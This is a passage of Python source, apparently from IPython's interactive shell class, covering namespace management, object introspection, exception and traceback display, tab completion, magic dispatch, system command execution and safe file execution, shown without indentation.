if varname in ('__builtin__', '__builtins__'):
raise ValueError("Refusing to delete %s" % varname)
ns_refs = self.all_ns_refs
if by_name: # Delete by name
for ns in ns_refs:
try:
del ns[varname]
except KeyError:
pass
else: # Delete by object
try:
obj = self.user_ns[varname]
except KeyError:
raise NameError("name '%s' is not defined" % varname)
# Also check in output history
ns_refs.append(self.history_manager.output_hist)
for ns in ns_refs:
to_delete = [n for n, o in ns.items() if o is obj]
for name in to_delete:
del ns[name]
# Ensure it is removed from the last execution result
if self.last_execution_result.result is obj:
self.last_execution_result = None
# displayhook keeps extra references, but not in a dictionary
for name in ('_', '__', '___'):
if getattr(self.displayhook, name) is obj:
setattr(self.displayhook, name, None)
def reset_selective(self, regex=None):
"""Clear selective variables from internal namespaces based on a
specified regular expression.
Parameters
----------
regex : string or compiled pattern, optional
A regular expression pattern that will be used in searching
variable names in the users namespaces.
"""
if regex is not None:
try:
m = re.compile(regex)
except TypeError:
raise TypeError('regex must be a string or compiled pattern')
# Search for keys in each namespace that match the given regex
# If a match is found, delete the key/value pair.
for ns in self.all_ns_refs:
for var in ns:
if m.search(var):
del ns[var]
def push(self, variables, interactive=True):
"""Inject a group of variables into the IPython user namespace.
Parameters
----------
variables : dict, str or list/tuple of str
The variables to inject into the user's namespace. If a dict, a
simple update is done. If a str, the string is assumed to have
variable names separated by spaces. A list/tuple of str can also
be used to give the variable names. If just the variable names are
give (list/tuple/str) then the variable values looked up in the
callers frame.
interactive : bool
If True (default), the variables will be listed with the ``who``
magic.
"""
vdict = None
# We need a dict of name/value pairs to do namespace updates.
if isinstance(variables, dict):
vdict = variables
elif isinstance(variables, (str, list, tuple)):
if isinstance(variables, str):
vlist = variables.split()
else:
vlist = variables
vdict = {}
cf = sys._getframe(1)
for name in vlist:
try:
vdict[name] = eval(name, cf.f_globals, cf.f_locals)
except:
print('Could not get variable %s from %s' %
(name,cf.f_code.co_name))
else:
raise ValueError('variables must be a dict/str/list/tuple')
# Propagate variables to user namespace
self.user_ns.update(vdict)
# And configure interactive visibility
user_ns_hidden = self.user_ns_hidden
if interactive:
for name in vdict:
user_ns_hidden.pop(name, None)
else:
user_ns_hidden.update(vdict)
def drop_by_id(self, variables):
"""Remove a dict of variables from the user namespace, if they are the
same as the values in the dictionary.
This is intended for use by extensions: variables that they've added can
be taken back out if they are unloaded, without removing any that the
user has overwritten.
Parameters
----------
variables : dict
A dictionary mapping object names (as strings) to the objects.
"""
for name, obj in variables.items():
if name in self.user_ns and self.user_ns[name] is obj:
del self.user_ns[name]
self.user_ns_hidden.pop(name, None)
#-------------------------------------------------------------------------
# Things related to object introspection
#-------------------------------------------------------------------------
def _ofind(self, oname, namespaces=None):
"""Find an object in the available namespaces.
self._ofind(oname) -> dict with keys: found,obj,ospace,ismagic
Has special code to detect magic functions.
"""
oname = oname.strip()
if not oname.startswith(ESC_MAGIC) and \
not oname.startswith(ESC_MAGIC2) and \
not all(a.isidentifier() for a in oname.split(".")):
return {'found': False}
if namespaces is None:
# Namespaces to search in:
# Put them in a list. The order is important so that we
# find things in the same order that Python finds them.
namespaces = [ ('Interactive', self.user_ns),
('Interactive (global)', self.user_global_ns),
('Python builtin', builtin_mod.__dict__),
]
ismagic = False
isalias = False
found = False
ospace = None
parent = None
obj = None
# Look for the given name by splitting it in parts. If the head is
# found, then we look for all the remaining parts as members, and only
# declare success if we can find them all.
oname_parts = oname.split('.')
oname_head, oname_rest = oname_parts[0],oname_parts[1:]
for nsname,ns in namespaces:
try:
obj = ns[oname_head]
except KeyError:
continue
else:
for idx, part in enumerate(oname_rest):
try:
parent = obj
# The last part is looked up in a special way to avoid
# descriptor invocation as it may raise or have side
# effects.
if idx == len(oname_rest) - 1:
obj = self._getattr_property(obj, part)
else:
obj = getattr(obj, part)
except:
# Blanket except b/c some badly implemented objects
# allow __getattr__ to raise exceptions other than
# AttributeError, which then crashes IPython.
break
else:
# If we finish the for loop (no break), we got all members
found = True
ospace = nsname
break # namespace loop
# Try to see if it's magic
if not found:
obj = None
if oname.startswith(ESC_MAGIC2):
oname = oname.lstrip(ESC_MAGIC2)
obj = self.find_cell_magic(oname)
elif oname.startswith(ESC_MAGIC):
oname = oname.lstrip(ESC_MAGIC)
obj = self.find_line_magic(oname)
else:
# search without prefix, so run? will find %run?
obj = self.find_line_magic(oname)
if obj is None:
obj = self.find_cell_magic(oname)
if obj is not None:
found = True
ospace = 'IPython internal'
ismagic = True
isalias = isinstance(obj, Alias)
# Last try: special-case some literals like '', [], {}, etc:
if not found and oname_head in ["''",'""','[]','{}','()']:
obj = eval(oname_head)
found = True
ospace = 'Interactive'
return {
'obj':obj,
'found':found,
'parent':parent,
'ismagic':ismagic,
'isalias':isalias,
'namespace':ospace
}
@staticmethod
def _getattr_property(obj, attrname):
"""Property-aware getattr to use in object finding.
If attrname represents a property, return it unevaluated (in case it has
side effects or raises an error.
"""
if not isinstance(obj, type):
try:
# `getattr(type(obj), attrname)` is not guaranteed to return
# `obj`, but does so for property:
#
# property.__get__(self, None, cls) -> self
#
# The universal alternative is to traverse the mro manually
# searching for attrname in class dicts.
attr = getattr(type(obj), attrname)
except AttributeError:
pass
else:
# This relies on the fact that data descriptors (with both
# __get__ & __set__ magic methods) take precedence over
# instance-level attributes:
#
# class A(object):
# @property
# def foobar(self): return 123
# a = A()
# a.__dict__['foobar'] = 345
# a.foobar # == 123
#
# So, a property may be returned right away.
if isinstance(attr, property):
return attr
# Nothing helped, fall back.
return getattr(obj, attrname)
def _object_find(self, oname, namespaces=None):
"""Find an object and return a struct with info about it."""
return Struct(self._ofind(oname, namespaces))
def _inspect(self, meth, oname, namespaces=None, **kw):
"""Generic interface to the inspector system.
This function is meant to be called by pdef, pdoc & friends.
"""
info = self._object_find(oname, namespaces)
docformat = sphinxify if self.sphinxify_docstring else None
if info.found:
pmethod = getattr(self.inspector, meth)
# TODO: only apply format_screen to the plain/text repr of the mime
# bundle.
formatter = format_screen if info.ismagic else docformat
if meth == 'pdoc':
pmethod(info.obj, oname, formatter)
elif meth == 'pinfo':
pmethod(
info.obj,
oname,
formatter,
info,
enable_html_pager=self.enable_html_pager,
**kw
)
else:
pmethod(info.obj, oname)
else:
print('Object `%s` not found.' % oname)
return 'not found' # so callers can take other action
def object_inspect(self, oname, detail_level=0):
"""Get object info about oname"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector.info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
return oinspect.object_info(name=oname, found=False)
def object_inspect_text(self, oname, detail_level=0):
"""Get object info as formatted text"""
return self.object_inspect_mime(oname, detail_level)['text/plain']
def object_inspect_mime(self, oname, detail_level=0):
"""Get object info as a mimebundle of formatted representations.
A mimebundle is a dictionary, keyed by mime-type.
It must always have the key `'text/plain'`.
"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector._get_info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
raise KeyError(oname)
#-------------------------------------------------------------------------
# Things related to history management
#-------------------------------------------------------------------------
def init_history(self):
"""Sets up the command history, and starts regular autosaves."""
self.history_manager = HistoryManager(shell=self, parent=self)
self.configurables.append(self.history_manager)
#-------------------------------------------------------------------------
# Things related to exception handling and tracebacks (not debugging)
#-------------------------------------------------------------------------
debugger_cls = Pdb
def set_custom_exc(self, exc_tuple, handler):
"""set_custom_exc(exc_tuple, handler)
Set a custom exception handler, which will be called if any of the
exceptions in exc_tuple occur in the mainloop (specifically, in the
run_code() method).
Parameters
----------
exc_tuple : tuple of exception classes
A *tuple* of exception classes, for which to call the defined
handler. It is very important that you use a tuple, and NOT A
LIST here, because of the way Python's except statement works. If
you only want to trap a single exception, use a singleton tuple::
exc_tuple == (MyCustomException,)
handler : callable
handler must have the following signature::
def my_handler(self, etype, value, tb, tb_offset=None):
...
return structured_traceback
Your handler must return a structured traceback (a list of strings),
or None.
This will be made into an instance method (via types.MethodType)
of IPython itself, and it will be called if any of the exceptions
listed in the exc_tuple are caught. If the handler is None, an
internal basic one is used, which just prints basic info.
To protect IPython from crashes, if your handler ever raises an
exception or returns an invalid result, it will be immediately
disabled.
WARNING: by putting in your own exception handler into IPython's main
execution loop, you run a very good chance of nasty crashes. This
facility should only be used if you really know what you are doing."""
if not isinstance(exc_tuple, tuple):
raise TypeError("The custom exceptions must be given as a tuple.")
def validate_stb(stb):
"""validate structured traceback return type
return type of CustomTB *should* be a list of strings, but allow
single strings or None, which are harmless.
This function will *always* return a list of strings,
and will raise a TypeError if stb is inappropriate.
"""
msg = "CustomTB must return list of strings, not %r" % stb
if stb is None:
return []
elif isinstance(stb, str):
return [stb]
elif not isinstance(stb, list):
raise TypeError(msg)
# it's a list
for line in stb:
# check every element
if not isinstance(line, str):
raise TypeError(msg)
return stb
if handler is None:
wrapped = dummy_handler
else:
def wrapped(self,etype,value,tb,tb_offset=None):
"""wrap CustomTB handler, to protect IPython from user code
This makes it harder (but not impossible) for custom exception
handlers to crash IPython.
"""
try:
stb = handler(self,etype,value,tb,tb_offset=tb_offset)
return validate_stb(stb)
except:
# clear custom handler immediately
self.set_custom_exc((), None)
print("Custom TB Handler failed, unregistering", file=sys.stderr)
# show the exception in handler first
stb = self.InteractiveTB.structured_traceback(*sys.exc_info())
print(self.InteractiveTB.stb2text(stb))
print("The original exception:")
stb = self.InteractiveTB.structured_traceback(
(etype,value,tb), tb_offset=tb_offset
)
return stb
self.CustomTB = types.MethodType(wrapped,self)
self.custom_exceptions = exc_tuple
def excepthook(self, etype, value, tb):
"""One more defense for GUI apps that call sys.excepthook.
GUI frameworks like wxPython trap exceptions and call
sys.excepthook themselves. I guess this is a feature that
enables them to keep running after exceptions that would
otherwise kill their mainloop. This is a bother for IPython
which excepts to catch all of the program exceptions with a try:
except: statement.
Normally, IPython sets sys.excepthook to a CrashHandler instance, so if
any app directly invokes sys.excepthook, it will look to the user like
IPython crashed. In order to work around this, we can disable the
CrashHandler and replace it with this excepthook instead, which prints a
regular traceback using our InteractiveTB. In this fashion, apps which
call sys.excepthook will generate a regular-looking exception from
IPython, and the CrashHandler will only be triggered by real IPython
crashes.
This hook should be used sparingly, only in places which are not likely
to be true IPython errors.
"""
self.showtraceback((etype, value, tb), tb_offset=0)
def _get_exc_info(self, exc_tuple=None):
"""get exc_info from a given tuple, sys.exc_info() or sys.last_type etc.
Ensures sys.last_type,value,traceback hold the exc_info we found,
from whichever source.
raises ValueError if none of these contain any information
"""
if exc_tuple is None:
etype, value, tb = sys.exc_info()
else:
etype, value, tb = exc_tuple
if etype is None:
if hasattr(sys, 'last_type'):
etype, value, tb = sys.last_type, sys.last_value, \
sys.last_traceback
if etype is None:
raise ValueError("No exception to find")
# Now store the exception info in sys.last_type etc.
# WARNING: these variables are somewhat deprecated and not
# necessarily safe to use in a threaded environment, but tools
# like pdb depend on their existence, so let's set them. If we
# find problems in the field, we'll need to revisit their use.
sys.last_type = etype
sys.last_value = value
sys.last_traceback = tb
return etype, value, tb
def show_usage_error(self, exc):
"""Show a short message for UsageErrors
These are special exceptions that shouldn't show a traceback.
"""
print("UsageError: %s" % exc, file=sys.stderr)
def get_exception_only(self, exc_tuple=None):
"""
Return as a string (ending with a newline) the exception that
just occurred, without any traceback.
"""
etype, value, tb = self._get_exc_info(exc_tuple)
msg = traceback.format_exception_only(etype, value)
return ''.join(msg)
def showtraceback(self, exc_tuple=None, filename=None, tb_offset=None,
exception_only=False, running_compiled_code=False):
"""Display the exception that just occurred.
If nothing is known about the exception, this is the method which
should be used throughout the code for presenting user tracebacks,
rather than directly invoking the InteractiveTB object.
A specific showsyntaxerror() also exists, but this method can take
care of calling it if needed, so unless you are explicitly catching a
SyntaxError exception, don't try to analyze the stack manually and
simply call this method."""
try:
try:
etype, value, tb = self._get_exc_info(exc_tuple)
except ValueError:
print('No traceback available to show.', file=sys.stderr)
return
if issubclass(etype, SyntaxError):
# Though this won't be called by syntax errors in the input
# line, there may be SyntaxError cases with imported code.
self.showsyntaxerror(filename, running_compiled_code)
elif etype is UsageError:
self.show_usage_error(value)
else:
if exception_only:
stb = ['An exception has occurred, use %tb to see '
'the full traceback.\n']
stb.extend(self.InteractiveTB.get_exception_only(etype,
value))
else:
try:
# Exception classes can customise their traceback - we
# use this in IPython.parallel for exceptions occurring
# in the engines. This should return a list of strings.
stb = value._render_traceback_()
except Exception:
stb = self.InteractiveTB.structured_traceback(etype,
value, tb, tb_offset=tb_offset)
self._showtraceback(etype, value, stb)
if self.call_pdb:
# drop into debugger
self.debugger(force=True)
return
# Actually show the traceback
self._showtraceback(etype, value, stb)
except KeyboardInterrupt:
print('\n' + self.get_exception_only(), file=sys.stderr)
def _showtraceback(self, etype, evalue, stb):
"""Actually show a traceback.
Subclasses may override this method to put the traceback on a different
place, like a side channel.
"""
print(self.InteractiveTB.stb2text(stb))
def showsyntaxerror(self, filename=None, running_compiled_code=False):
"""Display the syntax error that just occurred.
This doesn't display a stack trace because there isn't one.
If a filename is given, it is stuffed in the exception instead
of what was there before (because Python's parser always uses
"<string>" when reading from a string).
If the syntax error occurred when running a compiled code (i.e. running_compile_code=True),
longer stack trace will be displayed.
"""
etype, value, last_traceback = self._get_exc_info()
if filename and issubclass(etype, SyntaxError):
try:
value.filename = filename
except:
# Not the format we expect; leave it alone
pass
# If the error occurred when executing compiled code, we should provide full stacktrace.
elist = traceback.extract_tb(last_traceback) if running_compiled_code else []
stb = self.SyntaxTB.structured_traceback(etype, value, elist)
self._showtraceback(etype, value, stb)
# This is overridden in TerminalInteractiveShell to show a message about
# the %paste magic.
def showindentationerror(self):
"""Called by _run_cell when there's an IndentationError in code entered
at the prompt.
This is overridden in TerminalInteractiveShell to show a message about
the %paste magic."""
self.showsyntaxerror()
#-------------------------------------------------------------------------
# Things related to readline
#-------------------------------------------------------------------------
def init_readline(self):
"""DEPRECATED
Moved to terminal subclass, here only to simplify the init logic."""
# Set a number of methods that depend on readline to be no-op
warnings.warn('`init_readline` is no-op since IPython 5.0 and is Deprecated',
DeprecationWarning, stacklevel=2)
self.set_custom_completer = no_op
@skip_doctest
def set_next_input(self, s, replace=False):
""" Sets the 'default' input string for the next command line.
Example::
In [1]: _ip.set_next_input("Hello Word")
In [2]: Hello Word_ # cursor is here
"""
self.rl_next_input = s
def _indent_current_str(self):
"""return the current level of indentation as a string"""
return self.input_splitter.get_indent_spaces() * ' '
#-------------------------------------------------------------------------
# Things related to text completion
#-------------------------------------------------------------------------
def init_completer(self):
"""Initialize the completion machinery.
This creates completion machinery that can be used by client code,
either interactively in-process (typically triggered by the readline
library), programmatically (such as in test suites) or out-of-process
(typically over the network by remote frontends).
"""
from IPython.core.completer import IPCompleter
from IPython.core.completerlib import (module_completer,
magic_run_completer, cd_completer, reset_completer)
self.Completer = IPCompleter(shell=self,
namespace=self.user_ns,
global_namespace=self.user_global_ns,
parent=self,
)
self.configurables.append(self.Completer)
# Add custom completers to the basic ones built into IPCompleter
sdisp = self.strdispatchers.get('complete_command', StrDispatch())
self.strdispatchers['complete_command'] = sdisp
self.Completer.custom_completers = sdisp
self.set_hook('complete_command', module_completer, str_key = 'import')
self.set_hook('complete_command', module_completer, str_key = 'from')
self.set_hook('complete_command', module_completer, str_key = '%aimport')
self.set_hook('complete_command', magic_run_completer, str_key = '%run')
self.set_hook('complete_command', cd_completer, str_key = '%cd')
self.set_hook('complete_command', reset_completer, str_key = '%reset')
@skip_doctest
def complete(self, text, line=None, cursor_pos=None):
"""Return the completed text and a list of completions.
Parameters
----------
text : string
A string of text to be completed on. It can be given as empty and
instead a line/position pair are given. In this case, the
completer itself will split the line like readline does.
line : string, optional
The complete line that text is part of.
cursor_pos : int, optional
The position of the cursor on the input line.
Returns
-------
text : string
The actual text that was completed.
matches : list
A sorted list with all possible completions.
The optional arguments allow the completion to take more context into
account, and are part of the low-level completion API.
This is a wrapper around the completion mechanism, similar to what
readline does at the command line when the TAB key is hit. By
exposing it as a method, it can be used by other non-readline
environments (such as GUIs) for text completion.
Simple usage example:
In [1]: x = 'hello'
In [2]: _ip.complete('x.l')
Out[2]: ('x.l', ['x.ljust', 'x.lower', 'x.lstrip'])
"""
# Inject names into __builtin__ so we can complete on the added names.
with self.builtin_trap:
return self.Completer.complete(text, line, cursor_pos)
def set_custom_completer(self, completer, pos=0) -> None:
"""Adds a new custom completer function.
The position argument (defaults to 0) is the index in the completers
list where you want the completer to be inserted.
`completer` should have the following signature::
def completion(self: Completer, text: string) -> List[str]:
raise NotImplementedError
It will be bound to the current Completer instance and pass some text
and return a list with current completions to suggest to the user.
"""
newcomp = types.MethodType(completer, self.Completer)
self.Completer.custom_matchers.insert(pos,newcomp)
def set_completer_frame(self, frame=None):
"""Set the frame of the completer."""
if frame:
self.Completer.namespace = frame.f_locals
self.Completer.global_namespace = frame.f_globals
else:
self.Completer.namespace = self.user_ns
self.Completer.global_namespace = self.user_global_ns
#-------------------------------------------------------------------------
# Things related to magics
#-------------------------------------------------------------------------
# Defined here so that it's included in the documentation
@functools.wraps(magic.MagicsManager.register_function)
def run_line_magic(self, magic_name, line, _stack_depth=1):
"""Execute the given line magic.
Parameters
----------
magic_name : str
Name of the desired magic function, without '%' prefix.
line : str
The rest of the input line as a single string.
_stack_depth : int
If run_line_magic() is called from magic() then _stack_depth=2.
This is added to ensure backward compatibility for use of 'get_ipython().magic()'
"""
fn = self.find_line_magic(magic_name)
if fn is None:
cm = self.find_cell_magic(magic_name)
etpl = "Line magic function `%%%s` not found%s."
extra = '' if cm is None else (' (But cell magic `%%%%%s` exists, '
'did you mean that instead?)' % magic_name )
raise UsageError(etpl % (magic_name, extra))
else:
# Note: this is the distance in the stack to the user's frame.
# This will need to be updated if the internal calling logic gets
# refactored, or else we'll be expanding the wrong variables.
# Determine stack_depth depending on where run_line_magic() has been called
stack_depth = _stack_depth
if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
# magic has opted out of var_expand
magic_arg_s = line
else:
magic_arg_s = self.var_expand(line, stack_depth)
# Put magic args in a list so we can call with f(*a) syntax
args = [magic_arg_s]
kwargs = {}
# Grab local namespace if we need it:
if getattr(fn, "needs_local_scope", False):
kwargs['local_ns'] = self.get_local_scope(stack_depth)
with self.builtin_trap:
result = fn(*args, **kwargs)
return result
def get_local_scope(self, stack_depth):
"""Get local scope at given stack depth.
Parameters
----------
stack_depth : int
Depth relative to calling frame
"""
return sys._getframe(stack_depth + 1).f_locals
def run_cell_magic(self, magic_name, line, cell):
"""Execute the given cell magic.
Parameters
----------
magic_name : str
Name of the desired magic function, without '%' prefix.
line : str
The rest of the first input line as a single string.
cell : str
The body of the cell as a (possibly multiline) string.
"""
fn = self.find_cell_magic(magic_name)
if fn is None:
lm = self.find_line_magic(magic_name)
etpl = "Cell magic `%%{0}` not found{1}."
extra = '' if lm is None else (' (But line magic `%{0}` exists, '
'did you mean that instead?)'.format(magic_name))
raise UsageError(etpl.format(magic_name, extra))
elif cell == '':
message = '%%{0} is a cell magic, but the cell body is empty.'.format(magic_name)
if self.find_line_magic(magic_name) is not None:
message += ' Did you mean the line magic %{0} (single %)?'.format(magic_name)
raise UsageError(message)
else:
# Note: this is the distance in the stack to the user's frame.
# This will need to be updated if the internal calling logic gets
# refactored, or else we'll be expanding the wrong variables.
stack_depth = 2
if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
# magic has opted out of var_expand
magic_arg_s = line
else:
magic_arg_s = self.var_expand(line, stack_depth)
kwargs = {}
if getattr(fn, "needs_local_scope", False):
kwargs['local_ns'] = self.user_ns
with self.builtin_trap:
args = (magic_arg_s, cell)
result = fn(*args, **kwargs)
return result
def find_line_magic(self, magic_name):
"""Find and return a line magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['line'].get(magic_name)
def find_cell_magic(self, magic_name):
"""Find and return a cell magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['cell'].get(magic_name)
def find_magic(self, magic_name, magic_kind='line'):
"""Find and return a magic of the given type by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics[magic_kind].get(magic_name)
def magic(self, arg_s):
"""DEPRECATED. Use run_line_magic() instead.
Call a magic function by name.
Input: a string containing the name of the magic function to call and
any additional arguments to be passed to the magic.
magic('name -opt foo bar') is equivalent to typing at the ipython
prompt:
In[1]: %name -opt foo bar
To call a magic without arguments, simply use magic('name').
This provides a proper Python function to call IPython's magics in any
valid Python code you can type at the interpreter, including loops and
compound statements.
"""
# TODO: should we issue a loud deprecation warning here?
magic_name, _, magic_arg_s = arg_s.partition(' ')
magic_name = magic_name.lstrip(prefilter.ESC_MAGIC)
return self.run_line_magic(magic_name, magic_arg_s, _stack_depth=2)
#-------------------------------------------------------------------------
# Things related to macros
#-------------------------------------------------------------------------
def define_macro(self, name, themacro):
"""Define a new macro
Parameters
----------
name : str
The name of the macro.
themacro : str or Macro
The action to do upon invoking the macro. If a string, a new
Macro object is created by passing the string to it.
"""
from IPython.core import macro
if isinstance(themacro, str):
themacro = macro.Macro(themacro)
if not isinstance(themacro, macro.Macro):
raise ValueError('A macro must be a string or a Macro instance.')
self.user_ns[name] = themacro
#-------------------------------------------------------------------------
# Things related to the running of system commands
#-------------------------------------------------------------------------
def system_piped(self, cmd):
"""Call the given cmd in a subprocess, piping stdout/err
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported. Should not be a command that expects input
other than simple text.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
# We do not support backgrounding processes because we either use
# pexpect or pipes to read from. Users can always just call
# os.system() or use ip.system=ip.system_raw
# if they really want a background process.
raise OSError("Background processes not supported.")
# we explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns.
self.user_ns['_exit_code'] = system(self.var_expand(cmd, depth=1))
def system_raw(self, cmd):
"""Call the given cmd in a subprocess using os.system on Windows or
subprocess.call using the system shell on other platforms.
Parameters
----------
cmd : str
Command to execute.
"""
cmd = self.var_expand(cmd, depth=1)
# protect os.system from UNC paths on Windows, which it can't handle:
if sys.platform == 'win32':
from IPython.utils._process_win32 import AvoidUNCPath
with AvoidUNCPath() as path:
if path is not None:
cmd = '"pushd %s &&"%s' % (path, cmd)
try:
ec = os.system(cmd)
except KeyboardInterrupt:
print('\n' + self.get_exception_only(), file=sys.stderr)
ec = -2
else:
# For posix the result of the subprocess.call() below is an exit
# code, which by convention is zero for success, positive for
# program failure. Exit codes above 128 are reserved for signals,
# and the formula for converting a signal to an exit code is usually
# signal_number+128. To more easily differentiate between exit
# codes and signals, ipython uses negative numbers. For instance
# since control-c is signal 2 but exit code 130, ipython's
# _exit_code variable will read -2. Note that some shells like
# csh and fish don't follow sh/bash conventions for exit codes.
executable = os.environ.get('SHELL', None)
try:
# Use env shell instead of default /bin/sh
ec = subprocess.call(cmd, shell=True, executable=executable)
except KeyboardInterrupt:
# intercept control-C; a long traceback is not useful here
print('\n' + self.get_exception_only(), file=sys.stderr)
ec = 130
if ec > 128:
ec = -(ec - 128)
# We explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns. Note the semantics
# of _exit_code: for control-c, _exit_code == -signal.SIGNIT,
# but raising SystemExit(_exit_code) will give status 254!
self.user_ns['_exit_code'] = ec
# use piped system by default, because it is better behaved
system = system_piped
def getoutput(self, cmd, split=True, depth=0):
"""Get output (possibly including stderr) from a subprocess.
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported.
split : bool, optional
If True, split the output into an IPython SList. Otherwise, an
IPython LSString is returned. These are objects similar to normal
lists and strings, with a few convenience attributes for easier
manipulation of line-based output. You can use '?' on them for
details.
depth : int, optional
How many frames above the caller are the local variables which should
be expanded in the command string? The default (0) assumes that the
expansion variables are in the stack frame calling this function.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
raise OSError("Background processes not supported.")
out = getoutput(self.var_expand(cmd, depth=depth+1))
if split:
out = SList(out.splitlines())
else:
out = LSString(out)
return out
#-------------------------------------------------------------------------
# Things related to aliases
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to extensions
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to payloads
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Things related to the prefilter
#-------------------------------------------------------------------------
def auto_rewrite_input(self, cmd):
"""Print to the screen the rewritten form of the user's command.
This shows visual feedback by rewriting input lines that cause
automatic calling to kick in, like::
/f x
into::
------> f(x)
after the user's input prompt. This helps the user understand that the
input line was transformed automatically by IPython.
"""
if not self.show_rewritten_input:
return
# This is overridden in TerminalInteractiveShell to use fancy prompts
print("------> " + cmd)
#-------------------------------------------------------------------------
# Things related to extracting values/expressions from kernel and user_ns
#-------------------------------------------------------------------------
def _user_obj_error(self):
"""return simple exception dict
for use in user_expressions
"""
etype, evalue, tb = self._get_exc_info()
stb = self.InteractiveTB.get_exception_only(etype, evalue)
exc_info = {
u'status' : 'error',
u'traceback' : stb,
u'ename' : etype.__name__,
u'evalue' : py3compat.safe_unicode(evalue),
}
return exc_info
def _format_user_obj(self, obj):
"""format a user object to display dict
for use in user_expressions
"""
data, md = self.display_formatter.format(obj)
value = {
'status' : 'ok',
'data' : data,
'metadata' : md,
}
return value
def user_expressions(self, expressions):
"""Evaluate a dict of expressions in the user's namespace.
Parameters
----------
expressions : dict
A dict with string keys and string values. The expression values
should be valid Python expressions, each of which will be evaluated
in the user namespace.
Returns
-------
A dict, keyed like the input expressions dict, with the rich mime-typed
display_data of each value.
"""
out = {}
user_ns = self.user_ns
global_ns = self.user_global_ns
for key, expr in expressions.items():
try:
value = self._format_user_obj(eval(expr, global_ns, user_ns))
except:
value = self._user_obj_error()
out[key] = value
return out
#-------------------------------------------------------------------------
# Things related to the running of code
#-------------------------------------------------------------------------
def ex(self, cmd):
"""Execute a normal python statement in user namespace."""
with self.builtin_trap:
exec(cmd, self.user_global_ns, self.user_ns)
def ev(self, expr):
"""Evaluate python expression expr in user namespace.
Returns the result of evaluation
"""
with self.builtin_trap:
return eval(expr, self.user_global_ns, self.user_ns)
def safe_execfile(self, fname, *where, exit_ignore=False, raise_exceptions=False, shell_futures=False):
"""A safe version of the builtin execfile().
This version will never throw an exception, but instead print
helpful error messages to the screen. This only works on pure
Python files with the .py extension.
Parameters
----------
fname : string
The name of the file to be executed.
where : tuple
One or two namespaces, passed to execfile() as (globals,locals).
If only one is given, it is passed as both.
exit_ignore : bool (False)
If True, then silence SystemExit for non-zero status (it is always
silenced for zero status, as it is so common).
raise_exceptions : bool (False)
If True raise exceptions everywhere. Meant for testing.
shell_futures : bool (False)
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
"""
fname = os.path.abspath(os.path.expanduser(fname))
# Make sure we can open the file
try:
with open(fname):
pass
except:
warn('Could not open file <%s> for safe execution.' % fname)
return
# Find things also in current directory. This is needed to mimic the
# behavior of running a script from the system command line, where
# Python inserts the script's directory into sys.path
dname = os.path.dirname(fname)
with prepended_to_syspath(dname), self.builtin_trap:
try:
glob, loc = (where + (None, ))[:2]
py3compat.execfile(
fname, glob, loc,
self.compile if shell_futures else None)
except SystemExit as status:
# If the call was made with 0 or None exit status (sys.exit(0)
# or sys.exit() ), don't bother showing a traceback, as both of
# these are considered normal by the OS:
# > python -c'import sys;sys.exit(0)'; echo $?
# 0
# > python -c'import sys;sys.exit()'; echo $?
# 0
# For other exit status, we show the exception unless
# explicitly silenced, but only in short form.
if status.code:
if raise_exceptions:
raise
if not exit_ignore:
self.showtraceback(exception_only=True)
except:
if raise_exceptions:
raise
# tb offset is 2 because we wrap execfile
self.showtraceback(tb_offset=2)
def safe_execfile_ipy(self, fname, shell_futures=False, raise_exceptions=False):
"""Like safe_execfile, but for .ipy or .ipynb files with IPython syntax.
Parameters
----------
fname : str
The name of the file to execute. The filename must have a
.ipy or .ipynb extension.
shell_futures : bool (False)
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
raise_exceptions : bool (False)
If True raise exceptions everywhere. Meant for testing.
"""
fname = os.path.abspath(os.path.expanduser(fname))
# Make sure we can open the file
try:
with open(fname):
pass
except:
warn('Could not open file <%s> for safe execution.' % fname)
return
# Find things also in current directory. This is needed to mimic the
# behavior of running a script from the system command line, where
# Python inserts the script's directory into sys.path
dname = os.path.dirname(fname)
def get_cells():
"""generator for sequence of code blocks to run"""
if fname.endswith('.ipynb'):
from nbformat import read
nb = read(fname, as_version=4)
if not nb.cells:
return
for cell in nb.cells:
if cell.cell_type == 'code':
yield cell.source
else:
with open(fname) as f:
yield f.read()
with prepended_to_syspath(dname):
try:
for cell in get_cells():
result = self.run_cell(cell, silent=True, shell_futures=shell_futures)
if raise_exceptions:
result.raise_error()
elif not result.success:
break
except:
if raise_exceptions:
raise
self.showtraceback()
warn('Unknown failure executing file: <%s>' % fname)
def safe_run_module(self, mod_name, where):
"""A safe version of runpy.run_module().
This version will never throw an exception, but instead print
helpful error messages to the screen.
`SystemExit` exceptions with status code 0 or None are ignored.
Parameters
----------
mod_name : string
The name of the module to be executed.
where : dict
The globals namespace.
"""
try:
try:
where.update(
runpy.run_module(str(mod_name), run_name="__main__",
alter_sys=True)
)
except SystemExit as status:
if status.code:
raise
except:
self.showtraceback()
warn('Unknown failure executing module: <%s>' % mod_name)
def run_cell(self, raw_cell, store_history=False, silent=False, shell_futures=True):
"""Run a complete IPython cell.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
